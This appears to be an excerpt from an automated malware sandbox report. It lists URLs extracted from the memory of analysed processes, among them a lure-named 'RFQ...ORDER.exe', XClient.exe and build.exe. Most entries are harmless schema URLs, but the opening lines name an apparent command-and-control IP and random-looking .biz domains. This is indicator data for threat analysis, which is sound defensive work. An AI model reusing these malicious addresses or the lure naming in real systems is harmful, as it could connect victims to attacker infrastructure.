Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C0E000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/egeqrssrrvaebxd
Source: exhilaratingly.exe, 00000004.00000002.1262626782.0000000000B44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/fuutkfqprp
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1234361327.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/hgd
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1234361327.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/hgdN
Source: alg.exe, 00000003.00000003.1248416230.000000000048F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239/p
Source: exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/egeqrssrrvaebxd
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://52.11.240.239:80/hgdh)
Source: powershell.exe, 00000010.00000002.1433852870.00000219F939C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: alg.exe, 00000003.00000003.1351399233.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1341584430.00000000004D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://knjghuig.biz/0
Source: powershell.exe, 00000010.00000002.1416575661.0000021990076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1569294071.00000268701C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1808303171.0000020C68213000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: build.exe, 00000006.00000002.1707164175.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: exhilaratingly.exe, 00000004.00000002.1259436366.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394576368.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000010.00000002.1365957011.0000021980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000007.00000002.2500110094.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1365957011.0000021980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 00000010.00000002.1365957011.0000021980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1497950092.0000026860378000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1637024556.0000020C583C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394576368.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ssbzmoy.biz/
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 00000006.00000002.1724819529.0000000002DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: build.exe, 00000006.00000002.1724819529.0000000002AD6000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 00000006.00000002.1724819529.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: build.exe, 00000006.00000002.1724819529.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.1724819529.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
